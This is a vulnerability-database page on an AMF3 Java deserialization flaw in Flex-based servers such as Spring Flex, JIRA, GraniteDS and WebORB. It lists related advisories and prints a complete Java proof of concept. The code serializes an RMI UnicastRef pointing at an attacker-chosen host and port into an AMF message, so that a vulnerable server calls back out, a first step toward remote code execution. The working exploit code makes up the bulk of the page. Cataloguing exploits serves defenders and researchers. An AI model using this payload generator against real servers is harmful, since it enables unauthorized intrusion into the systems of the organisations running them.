Vulners
Lucene search
AMF3 Java implementations deserialization Vulnerability
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
 | Multiple Vulnerabilities in JIRA Workflow Servlet | 13 Feb 201704:43 | – | atlassian |
| Multiple Vulnerabilities in JIRA Workflow Servlet | 13 Feb 201704:43 | – | atlassian |
| Multiple Vulnerabilities in JIRA Workflow Servlet | 13 Feb 201704:43 | – | atlassian |
 | CVE-2017-5983 | 25 Nov 202521:02 | – | circl |
 | Atlassian JIRA Remote Code Execution Vulnerability | 12 Apr 201700:00 | – | cnvd |
| Pivotal Spring Flex Remote Code Execution Vulnerability | 6 Apr 201700:00 | – | cnvd |
| Exadel Flamingo Remote Code Execution Vulnerability | 24 May 201700:00 | – | cnvd |
| WebORB for Java Remote Code Execution Vulnerability | 24 May 201700:00 | – | cnvd |
| GraniteDS Remote Code Execution Vulnerability | 24 May 201700:00 | – | cnvd |
 | CVE-2017-3199 | 11 Jun 201817:00 | – | cve |
10
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.util.Arrays;
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.ActionContext;
import flex.messaging.io.amf.ActionMessage;
import flex.messaging.io.amf.AmfMessageDeserializer;
import flex.messaging.io.amf.AmfMessageSerializer;
import flex.messaging.io.amf.MessageBody;
public class Amf3ExternalizableUnicastRef {
public static void main(String[] args) throws IOException, ClassNotFoundException {
if (args.length < 2 || (args.length == 3 && !args[0].equals("-d"))) {
System.err.println("usage: java -jar " + Amf3ExternalizableUnicastRef.class.getSimpleName() + ".jar [-d] <host> <port>");
return;
}
boolean doDeserialize = false;
if (args.length == 3) {
doDeserialize = true;
args = Arrays.copyOfRange(args, 1, args.length);
}
// generate the UnicastRef object
Object unicastRef = generateUnicastRef(args[0], Integer.parseInt(args[1]));
// serialize object to AMF message
byte[] amf = serialize(unicastRef);
// deserialize AMF message
if (doDeserialize) {
deserialize(amf);
} else {
System.out.write(amf);
}
}
public static Object generateUnicastRef(String host, int port) {
java.rmi.server.ObjID objId = new java.rmi.server.ObjID();
sun.rmi.transport.tcp.TCPEndpoint endpoint = new sun.rmi.transport.tcp.TCPEndpoint(host, port);
sun.rmi.transport.LiveRef liveRef = new sun.rmi.transport.LiveRef(objId, endpoint, false);
return new sun.rmi.server.UnicastRef(liveRef);
}
public static byte[] serialize(Object data) throws IOException {
MessageBody body = new MessageBody();
body.setData(data);
ActionMessage message = new ActionMessage();
message.addBody(body);
ByteArrayOutputStream out = new ByteArrayOutputStream();
AmfMessageSerializer serializer = new AmfMessageSerializer();
serializer.initialize(SerializationContext.getSerializationContext(), out, null);
serializer.writeMessage(message);
return out.toByteArray();
}
public static void deserialize(byte[] amf) throws ClassNotFoundException, IOException {
ByteArrayInputStream in = new ByteArrayInputStream(amf);
AmfMessageDeserializer deserializer = new AmfMessageDeserializer();
deserializer.initialize(SerializationContext.getSerializationContext(), in, null);
deserializer.readMessage(new ActionMessage(), new ActionContext());
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2017 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.13846